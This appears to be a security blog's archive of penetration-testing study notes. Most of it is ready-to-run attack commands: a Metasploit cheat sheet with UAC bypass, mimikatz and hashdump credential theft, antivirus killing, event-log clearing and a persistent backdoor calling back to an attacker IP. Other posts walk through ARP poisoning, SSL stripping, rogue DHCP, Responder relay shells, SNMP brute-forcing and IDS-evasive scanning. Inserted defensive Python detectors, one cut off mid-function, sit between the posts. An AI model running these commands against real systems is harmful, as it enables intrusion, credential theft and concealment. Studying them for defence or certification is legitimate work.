Friday, July 31, 2020

[ICSI_CPT][metasploit] Privilege Escalation by disabling UAC

meterpreter > getsystem
Failed....

meterpreter > background

msf > use exploit/windows/local/bypassuac

msf > set session X

msf > run

meterpreter > getsystem
Successful...

[ICSI_CPT]Check Windows Patches and Updates

Check the status of system patches and updates with the following CMD command:
cmd > wmic qfe get Caption,Description,HotFixID,InstalledOn
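As an added example (not from the original post), the following Python script parses the output of the wmic qfe command above and turns it into something a reviewer can act on: the list of security updates, the date of the newest hotfix, and a "stale" flag when that date is older than an assumed threshold. The sample output, the KB numbers and the 45-day threshold are constructed for the example; the date format assumes an en-US locale.

```python
import re
from datetime import datetime

# Constructed sample of `wmic qfe` output (not captured from a real host); the KB numbers
# are placeholders. Columns are separated by runs of two or more spaces, as wmic prints them.
SAMPLE_WMIC_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=9000001  Update           KB9000001  5/21/2019
http://support.microsoft.com/?kbid=9000002  Security Update  KB9000002  1/14/2020
http://support.microsoft.com/?kbid=9000003  Security Update  KB9000003  1/14/2020
http://support.microsoft.com/?kbid=9000004  Update           KB9000004  9/11/2019
"""

COLUMN_SPLIT = re.compile(r"\s{2,}")
DATE_FORMAT = "%m/%d/%Y"   # assumption: en-US locale, which is how wmic formats InstalledOn there


def parse_wmic_qfe(text):
    """Return one dict per hotfix; InstalledOn is converted to a date object."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header = COLUMN_SPLIT.split(lines[0])
    rows = []
    for line in lines[1:]:
        fields = COLUMN_SPLIT.split(line)
        if len(fields) != len(header):
            continue    # skip a malformed line instead of aborting the whole audit
        row = dict(zip(header, fields))
        row["InstalledOn"] = datetime.strptime(row["InstalledOn"], DATE_FORMAT).date()
        rows.append(row)
    return rows


def patch_status(text, today, max_age_days=45):
    """Summarise the hotfix list and flag a host whose newest patch is older than max_age_days.

    `today` uses the same m/d/Y format as the wmic output, e.g. "7/31/2020".
    """
    rows = parse_wmic_qfe(text)
    today_date = datetime.strptime(today, DATE_FORMAT).date()
    newest = max(r["InstalledOn"] for r in rows)
    age = (today_date - newest).days
    return {
        "hotfixes": len(rows),
        "security_updates": sorted(r["HotFixID"] for r in rows if r["Description"] == "Security Update"),
        "newest_patch": newest.isoformat(),
        "days_since_last_patch": age,
        "stale": age > max_age_days,
    }


if __name__ == "__main__":
    for key, value in patch_status(SAMPLE_WMIC_QFE, "7/31/2020").items():
        print(f"{key}: {value}")
```

Feed it the real command output (wmic qfe get Caption,Description,HotFixID,InstalledOn > qfe.txt) and today's date; a host whose newest hotfix is months old is the one to look at first.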

[certificate]ISO/IEC27001 Lead Auditor-2


Thursday, July 30, 2020

[eCPPT]Search sub-domains of a Top Level Domain

1) Google:
site:microsoft.com

2) Zone Transfer:
# host -l microsoft.com soa.microsoft.com

3) Shodan & Censys:
Shodan: search microsoft.com
Censys: search certificates related to microsoft.com

4) DNS Enumeration:
# dnsenum microsoft.com
# dnsrecon -d microsoft.com
# fierce -dns microsoft.com

Wednesday, July 29, 2020

[eCPPT]Detect Web services and their versions

1) whatweb
# whatweb http://www.microsoft.com/
# whatweb -v http://www.microsoft.com/

2) wappalyzer
It is a browser extension that can be installed on Firefox and Chrome.

Sunday, July 26, 2020

[eCPPT][ICSI_CPT][Metasploit]Metasploit Cheat Sheet

Boot up Msfconsole:
# service postgresql start
# msfdb init
# msfconsole
msf > db_status

Search appropriate modules (some examples):
msf > search platform:Windows
msf > search platform:"Windows 7"
msf > search name:mysql
msf > search path:scada
msf > search author:jsmith
msf > search cve:2010-0249
msf > search cve:2011 author:jsmith platform:linux

Exploitation Procedure:
search -> use -> show options -> set -> show payloads -> set payload -> run

Migrate to another process within Meterpreter for a more stable session (P.S.: suppose the PID of davcdata.exe is 2732):
meterpreter > ps
 ...
 2660  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2732  604   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.

A simple first attempt at privilege escalation (P.S.: for Windows victims only):
meterpreter > getsystem

Find appropriate privilege escalation exploits (P.S.: suppose the existing session is 1):
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run

Privilege Escalation within Meterpreter (P.S.: suppose the MS10-015 vulnerability applies and the existing session is 2):
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2

Retrieve passwords via Meterpreter:
meterpreter > load mimikatz
meterpreter > mimikatz_command -f sekurlsa::searchPassword
meterpreter > kerberos

Install a backdoor agent via Meterpreter for persistent access:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.0.224
Here "-U" makes the backdoor agent execute automatically, "-i 5" makes it retry the connection to the backdoor server every 5 seconds when the connection fails, "-p 443" sets TCP 443 as the port the backdoor server listens on, and "-r 192.168.0.224" specifies the IP address of the backdoor server, 192.168.0.224 in this case.

Clean Windows Event Logs through Meterpreter:
meterpreter > clearev

Post-exploitation commands (for Windows):
meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/manage/migrate NAME=explorer.exe
meterpreter > run post/windows/manage/killav
meterpreter > run post/windows/gather/checkvm
meterpreter > run post/windows/manage/autoroute
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ie
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/credentials/credentials_collector
meterpreter > run post/windows/gather/screen_spy
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/win_privs
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/multi/recon/local_exploit_suggester

Post-exploitation commands (for Linux):
meterpreter > sysinfo
meterpreter > run post/linux/gather/enum_configs
meterpreter > run post/linux/gather/enum_system
meterpreter > run post/linux/gather/enum_users_history
meterpreter > run post/multi/recon/local_exploit_suggester

AutoRun Post-exploitation commands:
1) Save the commands above into an rc file, e.g. /root/autorun.rc
2) In the handler module, set the corresponding options and execute the following commands:
msf handler > set AutoRunScript multi_console_command -rc /root/autorun.rc
msf handler > run

Post-exploitation for further exploration:
1) ARP Scan (PS: suppose the target network is 10.32.120.0/24):
meterpreter > run arp_scanner -r 10.32.120.0/24
2) Use the compromised PC as a router/jumpbox (PS: suppose the target network is 192.168.2.0/24, and the meterpreter session id is 1):
meterpreter > background
msf > route add 192.168.2.0 255.255.255.0 1
The updated routing table can be confirmed by executing the following command:
msf > route print
The target network can be scanned through the jumpbox now by executing the commands below:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.2.1
msf > set PORTS 1-1024
msf > run

Friday, July 24, 2020

Thursday, July 23, 2020

[ICSI_CPT] Host Discovery

Passive Discovery:
# netdiscover -p

Active Discovery:
# netdiscover -r 192.168.1.0/24
# nmap -sP 192.168.1.0/24

[ICSI_CPT][DNS] DNS Discovery

# host -l microsoft.com soa.microsoft.com
# dnsenum microsoft.com
# dnsrecon -d microsoft.com

[ICSI_CPT][eCPPT][Threat Intelligence] Shodan Hacking

Reference: https://developer.shodan.io/api
Update Date: July 23, 2020

data:
OLD IIS
"iis/5.0"
microsoft.com

city:
city:London
city:Singapore

country:
country:SG
country:US

geo [An example below: Devices within a 50km radius of San Diego (32.8,-117)]:
geo:32.8,-117,50

hostname:
hostname:test

net:
net:216.219.0.0/16

ip:
ip:8.8.4.4
ip:1.1.1.1

os:
os:windows
os:"windows 2003"

port:
port:445
port:135

before/after [An example below: Apache servers located in China and appearing between March 22, 2010 and June 4, 2010]:
apache country:CN after:22/03/2010 before:04/06/2010

device:
device:router
device:webcam

Sunday, July 19, 2020

OS Configuration Security Review | Local Vulnerability Scan

[Windows:]

Policy Analyzer (Microsoft Security Compliance Toolkit)
https://www.microsoft.com/en-us/download/details.aspx?id=55319

Microsoft Baseline Security Analyzer (MBSA)
https://www.microsoft.com/en-us/download/details.aspx?id=19892


[Linux:]

OpenSCAP
https://www.open-scap.org/

Lynis
https://cisofy.com/lynis/

Saturday, July 18, 2020

[eCPPT][SSL][MITM] SSL Strip Attack

Comment: The following experiment works well with Kali 2018.1. I do not use the newest version (2020.X) because it does not ship sslstrip by default, and python-twisted-web, which sslstrip requires, is difficult to install there.

Running (in this case, 192.168.0.19 is the victim, 192.168.0.1 is the gateway, and TCP 8080 is the listening port):
# sysctl net.ipv4.ip_forward=1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -a -f -l 8080 -w /root/sslstrip.log
Open a new terminal and type:
# arpspoof -i eth0 -t 192.168.0.19 -r 192.168.0.1

Harvest:
Open a new terminal and type:
# tail -n 30 -f /root/sslstrip.log

P.S.: This experimentation only succeeds when the victim's browser does not support HSTS.
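The HSTS caveat above is what a site owner can act on: the browser only refuses the downgrade once it has cached a Strict-Transport-Security policy from the site. As an added example (not part of the original post), the Python below parses an HSTS header value the way a browser would and classifies how exposed the site remains to this kind of stripping. The header samples are constructed, and the one-year max-age floor is an assumption of the example.

```python
ONE_YEAR = 31536000   # seconds; assumed floor for a policy we consider strong


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains, preload).

    Returns None when the header is absent or carries no valid max-age, which is how
    browsers treat it: no policy gets cached at all.
    """
    if header is None:
        return None
    max_age, include_sub, preload = None, False, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None
    return max_age, include_sub, preload


def hsts_verdict(header):
    """Classify a site's exposure to sslstrip-style downgrade from its HSTS header alone."""
    parsed = parse_hsts(header)
    if parsed is None:
        return "exposed: no usable HSTS policy; every visit can be downgraded"
    max_age, include_sub, preload = parsed
    if max_age == 0:
        return "exposed: max-age=0 clears any cached policy"
    weaknesses = []
    if max_age < ONE_YEAR:
        weaknesses.append(f"max-age {max_age}s is short, policy expires quickly")
    if not include_sub:
        weaknesses.append("subdomains are not covered")
    if not preload:
        weaknesses.append("not preload-eligible, so the very first visit is still unprotected")
    if weaknesses:
        return "weak: " + "; ".join(weaknesses)
    return "strong: returning browsers refuse plain HTTP (first visit still relies on the preload list)"


# Constructed header samples (not real responses from any site named on the page).
SAMPLES = {
    "no header": None,
    "short": "max-age=300",
    "typical": "max-age=31536000; includeSubDomains",
    "preload-ready": "max-age=63072000; includeSubDomains; preload",
    "cleared": "max-age=0",
    "broken": "max-age=abc; includeSubDomains",
}


def verdicts(samples=SAMPLES):
    return {name: hsts_verdict(value) for name, value in samples.items()}


if __name__ == "__main__":
    for name, verdict in verdicts().items():
        print(f"{name:14} -> {verdict}")
```

To check a live site, pass the value of its Strict-Transport-Security response header (curl -sI https://example.test) to hsts_verdict; a "strong" verdict still only covers browsers that have visited over HTTPS before, which is exactly why preload-list submission matters.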

Friday, July 17, 2020

[eCPPT][MITM]Bettercap to launch ARP POISONING

Installation:
# apt-get update
# apt-get install bettercap

Execution:
# sysctl net.ipv4.ip_forward=1
# bettercap -iface wlan0

Tweaking:
The help command shows the status of the modules:
>> help
Use "MODULE_NAME on/off" to turn a specific module on or off:
>> arp.spoof on
>> net.sniff off

ARP Poisoning:
>> net.recon on
>> net.sniff on
>> arp.spoof on

Thursday, July 16, 2020

[eCPPT][MITM][Spoofing][Poisoning]LAN-Based Man In The Middle Attacks

1) MAC Flooding

Currently, most switches can each store 100,000,000 MAC addresses. As such, the following command can stuff the CAM table:
# sysctl net.ipv4.conf.all.forwarding=1
# macof -i eth0 -n 100000000
This attack is obsolete given that modern switches can each store a great quantity of MAC addresses.

Countermeasure:
- Port Security, which limits the number of PCs connecting to each port
- IEEE 802.1X, which forces connected PCs to authenticate their identities
- MAC filtering, which only allows authorized MAC addresses to communicate


2) ARP Poisoning

In the scenario below, 192.168.0.1 is the gateway's IP address, and 192.168.0.7 is the victim's IP Address.
# sysctl net.ipv4.conf.all.forwarding=1
# arpspoof -i eth0 -t 192.168.0.7 -r 192.168.0.1
Then use Wireshark to capture the forwarded traffic and pick out the confidential information.

More details can be found in the following two documents:
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on.html
https://alexchaoyihuang.blogspot.com/2018/07/performing-arp-spoofingpoisoning-on_5.html

Countermeasure:
- Encryption in transit and at rest to withstand man-in-the-middle attacks and interception
- Applying static ARP entries on the network
- Using integrated solutions such as Cisco DHCP Snooping and Dynamic ARP Inspection
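Both attacks in sections 1 and 2 (and the arpspoof/bettercap runs in the posts above) leave a characteristic trace on the wire, so as an added example (not from the original post) here is the detection side in Python: a monitor that learns IP-to-MAC bindings from ARP replies, alerts when the gateway binding changes or when one MAC answers for both the gateway and a host (the two-way spoof), and separately counts distinct sender MACs per second to catch a macof-style flood. The gateway address and MAC, the thresholds and the reply stream are constructed for the example.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"                     # assumed gateway of the monitored LAN
GATEWAY_MAC = "aa:aa:aa:aa:aa:01"              # assumed known-good gateway MAC (constructed)
FLOOD_THRESHOLD = 50                           # distinct sender MACs per window we tolerate
FLOOD_WINDOW = 1.0                             # seconds


def detect_arp_poisoning(replies):
    """Alert on IP/MAC binding changes and on one MAC claiming both gateway and host.

    `replies` is an iterable of (timestamp, sender_mac, sender_ip) taken from ARP
    "is-at" replies. Bindings are learned on first sight, seeded with the gateway.
    """
    alerts = []
    bindings = {GATEWAY_IP: GATEWAY_MAC}       # ip -> mac
    ips_by_mac = defaultdict(set)
    two_way_reported = set()
    for ts, mac, ip in replies:
        mac = mac.lower()
        ips_by_mac[mac].add(ip)
        known = bindings.get(ip)
        if known is None:
            bindings[ip] = mac
        elif known != mac:
            kind = "gateway impersonation" if ip == GATEWAY_IP else "binding change"
            alerts.append(f"t={ts:.1f} {kind}: {ip} moved from {known} to {mac}")
            bindings[ip] = mac
        # A non-gateway MAC answering for the gateway *and* for a host is the
        # two-way spoof that "arpspoof -t victim -r gateway" produces.
        if (mac != GATEWAY_MAC and GATEWAY_IP in ips_by_mac[mac]
                and len(ips_by_mac[mac]) > 1 and mac not in two_way_reported):
            two_way_reported.add(mac)
            others = sorted(ips_by_mac[mac] - {GATEWAY_IP})
            alerts.append(f"t={ts:.1f} two-way poisoning: {mac} claims {GATEWAY_IP} and {others}")
    return alerts


def detect_mac_flood(replies, threshold=FLOOD_THRESHOLD, window=FLOOD_WINDOW):
    """Return (window_start, distinct_macs) for windows with an abnormal number of senders."""
    buckets = defaultdict(set)
    for ts, mac, _ip in replies:
        buckets[int(ts // window)].add(mac.lower())
    return [(b * window, len(macs)) for b, macs in sorted(buckets.items()) if len(macs) > threshold]


def constructed_replies():
    """Constructed ARP reply stream: benign traffic, then a two-way poison, then a MAC burst."""
    replies = [
        (0.0, "aa:aa:aa:aa:aa:01", "192.168.0.1"),
        (0.5, "bb:bb:bb:bb:bb:07", "192.168.0.7"),
        (1.2, "cc:cc:cc:cc:cc:19", "192.168.0.19"),
        (5.0, "de:ad:be:ef:00:01", "192.168.0.1"),    # attacker tells the LAN it is the gateway
        (5.1, "de:ad:be:ef:00:01", "192.168.0.7"),    # and tells the gateway it is the victim
    ]
    for i in range(60):                                # macof-style burst inside one second
        replies.append((10.0 + i / 100, f"02:00:00:00:00:{i:02x}", f"10.0.0.{i + 1}"))
    return replies


if __name__ == "__main__":
    stream = constructed_replies()
    for alert in detect_arp_poisoning(stream):
        print(alert)
    for start, count in detect_mac_flood(stream):
        print(f"MAC flood: {count} distinct senders in the second starting at t={start}")
```

On a real segment the tuples would come from a sniffer filtering on ARP opcode 2; the static gateway binding is the same idea as the static ARP countermeasure above, applied at the monitor instead of on every host.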


3) DHCP Spoofing

Install Yersinia first:
# apt-get update
# apt-get install yersinia
Now start hacking:
# ifconfig eth0:1 192.168.1.1 netmask 255.255.255.0
# ifconfig eth0:1 up
# sysctl net.ipv4.ip_forward=1
Follow the steps below to launch a DHCP Starvation attack in order to exhaust the authorized DHCP server's pool:
# yersinia -I
"i" -> Change to the network adapter "eth0" -> "q"
"F2" to change to DHCP mode
"x" -> "1"
And then start launching a rogue DHCP server:
"x" -> "2"
Fill out the following information before pressing ENTER to launch the DHCP Spoofing attack:
Server ID: 192.168.001.001
Start IP: 192.168.001.100
End IP: 192.168.001.200
Lease Time (secs): 99999999
Renew Time (secs): 99999999
Subnet Mask: 255.255.255.000
Router: 192.168.001.001
DNS Server: 008.008.004.004
Domain: test.com
The next step is to allow the network created by the rogue DHCP server to access the legitimate networks by establishing a NAT rule, as shown below.
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
At the end, don't forget to turn off the firewall, if any.

Countermeasure:
- Give up DHCP and use static IP addresses instead
- Deploy NIDS-like systems to detect DHCP Starvation attacks
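The second countermeasure is easy to make concrete. As an added example (not from the original post), the Python below checks DHCPOFFERs against an allowlist of authorized servers, gateways and DNS servers, flags abnormal lease times, and counts distinct client MACs sending DHCPDISCOVER per window to spot starvation. The allowlists and thresholds are assumptions; the rogue offer sample deliberately reuses the values the Yersinia walkthrough fills in, and the legitimate sample is constructed.

```python
from collections import defaultdict

# Assumed allowlists for the monitored segment (constructed for this example).
LEGIT_SERVERS = {"192.168.1.254"}
LEGIT_ROUTERS = {"192.168.1.254"}
LEGIT_DNS = {"192.168.1.254", "192.168.1.253"}
MAX_LEASE_SECONDS = 7 * 24 * 3600     # leases beyond a week are abnormal on this segment
STARVE_THRESHOLD = 100                # distinct client MACs per window before we call it starvation
STARVE_WINDOW = 10.0                  # seconds


def check_offer(offer):
    """Return the reasons a DHCPOFFER looks rogue; an empty list means it matches policy.

    `offer` is a dict with server_id, router, dns and lease (seconds), i.e. the
    options a client would act on.
    """
    reasons = []
    if offer["server_id"] not in LEGIT_SERVERS:
        reasons.append(f"unknown DHCP server {offer['server_id']}")
    if offer["router"] not in LEGIT_ROUTERS:
        reasons.append(f"unexpected default gateway {offer['router']}")
    if offer["dns"] not in LEGIT_DNS:
        reasons.append(f"unexpected DNS server {offer['dns']}")
    if offer["lease"] > MAX_LEASE_SECONDS:
        reasons.append(f"abnormal lease time {offer['lease']}s")
    return reasons


def detect_starvation(discovers, threshold=STARVE_THRESHOLD, window=STARVE_WINDOW):
    """Return (window_start, distinct_clients) for windows flooded with DHCPDISCOVERs.

    `discovers` is an iterable of (timestamp, client_mac). Starvation tools cycle
    through fake client MACs, so the distinct-MAC count per window explodes.
    """
    buckets = defaultdict(set)
    for ts, client_mac in discovers:
        buckets[int(ts // window)].add(client_mac.lower())
    return [(b * window, len(macs)) for b, macs in sorted(buckets.items()) if len(macs) > threshold]


# Constructed messages. The rogue offer reuses the values from the Yersinia walkthrough
# above; the legitimate one matches the allowlists.
LEGIT_OFFER = {"server_id": "192.168.1.254", "router": "192.168.1.254",
               "dns": "192.168.1.254", "lease": 86400}
ROGUE_OFFER = {"server_id": "192.168.1.1", "router": "192.168.1.1",
               "dns": "8.8.4.4", "lease": 99999999}
# 150 DISCOVERs from distinct (constructed) client MACs within 7.5 seconds.
CONSTRUCTED_DISCOVERS = [(i * 0.05, f"02:11:22:33:{i // 256:02x}:{i % 256:02x}") for i in range(150)]


if __name__ == "__main__":
    for name, offer in (("legit", LEGIT_OFFER), ("rogue", ROGUE_OFFER)):
        print(name, check_offer(offer) or "ok")
    for start, count in detect_starvation(CONSTRUCTED_DISCOVERS):
        print(f"starvation: {count} distinct clients in the window starting at t={start}")
```

In practice the offers and discovers come from DHCP snooping logs on the switch or a sniffer on UDP 67/68; the switch-side equivalent of check_offer is simply marking the authorized server's port as trusted.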


4) LLMNR/NBT-NS Spoofing/Poisoning (Responder && MultiRelay)

Scenario #1:
When someone in the same Windows domain makes a typo with a nonexistent hostname, the following command captures the request and answers it with a fake response in order to obtain that user's username and password hash.
[Attacker Kali PC:]
# responder -I eth0
After obtaining the username and hash:
# cd /usr/share/responder/logs
Apply John the Ripper to the captured hash as shown below:
# john ./SMB-NTLMv1-SSP-192.168.0.11.txt

Scenario #2:
If the PCs in the Windows network have WPAD enabled to configure their proxy settings, the WPAD listener can be enabled to trick the PCs' owners into typing their passwords; the attacker then obtains the passwords without cracking anything.
[Attacker Kali PC:]
# responder -I eth0 -wrFb

Scenario #3:
The MultiRelay function of Responder can be applied when SMB Signing is disabled on the victim's PC.
[Attacker Kali PC:]
First determine whether SMB Signing is disabled on the victim:
# /usr/share/responder/tools/RunFinger.py -i 192.168.0.11
After confirming that SMB Signing is disabled on the victim's PC, edit Responder.conf and turn off the SMB and HTTP servers:
# vi /etc/responder/Responder.conf
SMB = Off
HTTP = Off
:wq
# responder -I eth0 --lm
The following command can help get a shell directly:
# /usr/share/responder/tools/MultiRelay.py -t 192.168.0.11 -u ALL

Countermeasure:
- Enable SMB Signing

Friday, July 10, 2020

[eCPPT][snmp]SNMP Hacking

[Server:]
For the server side, install an SNMP daemon through Docker:
# /etc/init.d/docker start
# docker run -d --name snmpd -p 161:161/udp polinux/snmpd


[Hacker:]
Confirm if the remote SNMP is working properly:
# nmap -sU -sV -n -p 161 192.168.0.253

Check which Nmap scripts can be used to get further information:
# ll /usr/share/nmap/scripts/|grep snmp
-rw-r--r-- 1 root root  7501 Mar 10 12:52 snmp-brute.nse
-rw-r--r-- 1 root root  4375 Mar 10 12:52 snmp-hh3c-logins.nse
-rw-r--r-- 1 root root  5216 Mar 10 12:52 snmp-info.nse
-rw-r--r-- 1 root root 28629 Mar 10 12:52 snmp-interfaces.nse
-rw-r--r-- 1 root root  5965 Mar 10 12:52 snmp-ios-config.nse
-rw-r--r-- 1 root root  4143 Mar 10 12:52 snmp-netstat.nse
-rw-r--r-- 1 root root  4418 Mar 10 12:52 snmp-processes.nse
-rw-r--r-- 1 root root  1854 Mar 10 12:52 snmp-sysdescr.nse
-rw-r--r-- 1 root root  2557 Mar 10 12:52 snmp-win32-services.nse
-rw-r--r-- 1 root root  2726 Mar 10 12:52 snmp-win32-shares.nse
-rw-r--r-- 1 root root  4700 Mar 10 12:52 snmp-win32-software.nse
-rw-r--r-- 1 root root  2003 Mar 10 12:52 snmp-win32-users.nse

Brute Force the community strings:
# nmap -sU -p 161 --script=snmp-brute.nse --script-args=snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.0.253
# hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.0.253

Try the default community string, "public", by SNMP walking:
# snmpwalk -v 2c 192.168.0.253 -c public

Get a clearer picture of the target's settings via SNMP:
# snmp-check 192.168.0.253 -c public

Check an OID and modify it:
# snmpwalk -v 2c 192.168.0.253 -c public .iso.3.6.1.2.1.1.9.1.3.1
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
# snmpset -v 2c -c private 192.168.0.253 .iso.3.6.1.2.1.1.9.1.3.1 s "Test"
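Everything above worked because the daemon answered to "public" and accepted writes with "private". As an added example (not from the original post), the Python below audits a Net-SNMP snmpd.conf for exactly those weaknesses: guessable community strings, write access via rwcommunity, and community directives with no source restriction. The rocommunity/rwcommunity/com2sec syntax is Net-SNMP's real one; the configuration text and the list of "weak" community names are constructed for the example.

```python
# Community names that appear in every default wordlist; an assumption of this example.
WEAK_COMMUNITIES = {"public", "private", "community", "manager", "admin", "snmp"}
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}


def audit_snmpd_conf(text):
    """Return (line_number, severity, message) findings for a Net-SNMP snmpd.conf."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            # syntax: rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
            community = parts[1] if len(parts) > 1 else ""
            source = parts[2] if len(parts) > 2 else "default"
            if community.lower() in WEAK_COMMUNITIES:
                findings.append((lineno, "HIGH", f"{directive} uses guessable community '{community}'"))
            if directive.startswith("rw"):
                findings.append((lineno, "HIGH", f"write access granted via {directive} (snmpset can change OIDs)"))
            if source in ANY_SOURCE:
                findings.append((lineno, "MEDIUM", f"{directive} '{community}' accepts requests from any source"))
        elif directive == "com2sec":
            # syntax: com2sec SECNAME SOURCE COMMUNITY
            if len(parts) >= 4 and parts[3].lower() in WEAK_COMMUNITIES:
                findings.append((lineno, "HIGH", f"com2sec maps guessable community '{parts[3]}'"))
    return findings


def is_hardened(text):
    """True when the config carries no HIGH finding."""
    return not any(sev == "HIGH" for _, sev, _ in audit_snmpd_conf(text))


# Constructed snmpd.conf, not the one shipped in the Docker image used above.
SAMPLE_CONF = """\
# constructed sample
rocommunity public
rwcommunity private
rocommunity  monit0r-Xq7 192.168.0.0/24
com2sec local localhost public
"""

if __name__ == "__main__":
    for lineno, severity, message in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {lineno} [{severity}] {message}")
    print("hardened:", is_hardened(SAMPLE_CONF))
```

Run it over /etc/snmp/snmpd.conf on the hosts you manage; the fix for every HIGH finding is the same: a long random community restricted to the monitoring subnet, read-only, or SNMPv3 with authentication and privacy.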

Wednesday, July 8, 2020

[eCPPT]SMB and RPC enumeration and mounting

Enumeration:
# enum4linux 192.168.0.191
# nbtstat -v 192.168.0.191
# rpcclient -N -U "" 192.168.0.191

Mount share drives:
# mount.cifs //192.168.0.191/C /media/C_share/ -o user=,pass=
# smbclient \\\\192.168.0.191\\C "welcome20XX" -U "TempUser"

Audit Linux command line

1) The script and scriptreplay commands
tecmint@tecmint ~ $ script --timing=time.txt script.log
Script started, file is script.log
tecmint@tecmint ~ $ exit
Script done, file is script.log
tecmint@tecmint ~ $ scriptreplay --timing=time.txt script.log


2) The trap command:
$ trap 'echo "$USER":"$BASH_COMMAND" >>/path/to/log' DEBUG
$ uname
Linux
$ pwd
/home/dessert
$ hostname
dessert’s plowhorse
$ ls
dir1 file1 file2
$
$
$ bahs
No command 'bahs' found, did you mean:
 Command 'bash' from package 'bash' (main)
 Command 'bats' from package 'bats' (universe)
bahs: command not found
$ cat /path/to/log
dessert:uname
dessert:pwd
dessert:hostname
dessert:ls --color=auto
dessert:bahs
dessert:cat /path/to/log

Monday, July 6, 2020

[eCPPT][nmap]Scanning techniques for Firewall/IDS Evasion

1) Fragmentation
Use the parameters "-sS -f", for example:
# nmap -sS -f 192.168.0.1
This technique is obsolete given that nearly all modern NIDSs can detect this kind of scanning.

2) Decoy
Use the parameters "-sS -D" to add a couple of bogus IP addresses as decoy scanners in order to confuse security analysts.
# nmap -sS -D 192.168.0.3,192.168.0.5,192.168.0.7,ME,192.168.0.11 192.168.0.251

3) Prolong the interval between scan requests
Apply "-T0" (5 minutes) or "-T1" (15 seconds) to the scan in order to hide the scanning activity.
# nmap -sS -p 25,80,443 -T0 192.168.0.1

4) Set Scanning Source Port as Famous Service Port
Change the source port of the scanning probes to a well-known service port (e.g. 25, 80 or 443) with the "-g" parameter.
# nmap -sS -g 25 192.168.0.1
# nmap -sU -g 53 192.168.0.251

5) Idle Scan
Use a zombie host to scan the target through the "-sI" parameter.
First, determine whether a host (e.g. 192.168.0.251) can serve as a zombie:
# nmap -O -v -n 192.168.0.251
Second, if the zombie host is confirmed to be usable, use it to scan the target (e.g. 192.168.0.253):
# nmap -p22 -sI 192.168.0.251:443 192.168.0.253
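Each of the techniques above also leaves a pattern a firewall log can reveal. As an added example (not from the original post), the Python below reads dropped-SYN lines in iptables LOG format and flags three of them from the defender's side: client SYNs arriving from a service source port (the "-g" trick), a source touching many distinct ports on one host within a wide window (which also catches -T0/-T1 scans that are slow but add up), and several sources scanning the same target in the same window (a "-D" decoy set, of which the real scanner is one member). The log lines, the epoch-timestamp prefix and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict

KV = re.compile(r"(\w+)=(\S*)")
SERVICE_SRC_PORTS = {20, 25, 53, 80, 443}   # ports the -g trick borrows
PORT_SCAN_MIN_PORTS = 10                   # distinct destination ports from one source
WINDOW = 3600                              # seconds; wide enough to accumulate -T0 probes


def parse_line(line):
    """Return dict(ts, src, dst, spt, dpt) for a TCP SYN log line, else None."""
    m = re.match(r"^(\d+)\s", line)        # constructed lines start with an epoch timestamp
    if not m or "SYN" not in line:
        return None
    kv = dict(KV.findall(line))
    if kv.get("PROTO") != "TCP":
        return None
    return {"ts": int(m.group(1)), "src": kv["SRC"], "dst": kv["DST"],
            "spt": int(kv["SPT"]), "dpt": int(kv["DPT"])}


def analyze(lines):
    """Return alert strings for service-port probes, port scans and decoy sets."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    alerts = []
    # 1) A client SYN should come from an ephemeral port, not 25/53/80/443.
    seen_service = set()
    for e in events:
        key = (e["src"], e["spt"], e["dst"], e["dpt"])
        if e["spt"] in SERVICE_SRC_PORTS and key not in seen_service:
            seen_service.add(key)
            alerts.append(f"{e['src']} SYN from service port {e['spt']} to {e['dst']}:{e['dpt']} (nmap -g?)")
    # 2) Distinct destination ports per (source, target, window).
    ports = defaultdict(set)
    for e in events:
        ports[(e["src"], e["dst"], e["ts"] // WINDOW)].add(e["dpt"])
    scanners = defaultdict(set)            # (target, window) -> sources that scanned it
    for (src, dst, w), dpts in ports.items():
        if len(dpts) >= PORT_SCAN_MIN_PORTS:
            alerts.append(f"{src} probed {len(dpts)} ports on {dst} within window {w}")
            scanners[(dst, w)].add(src)
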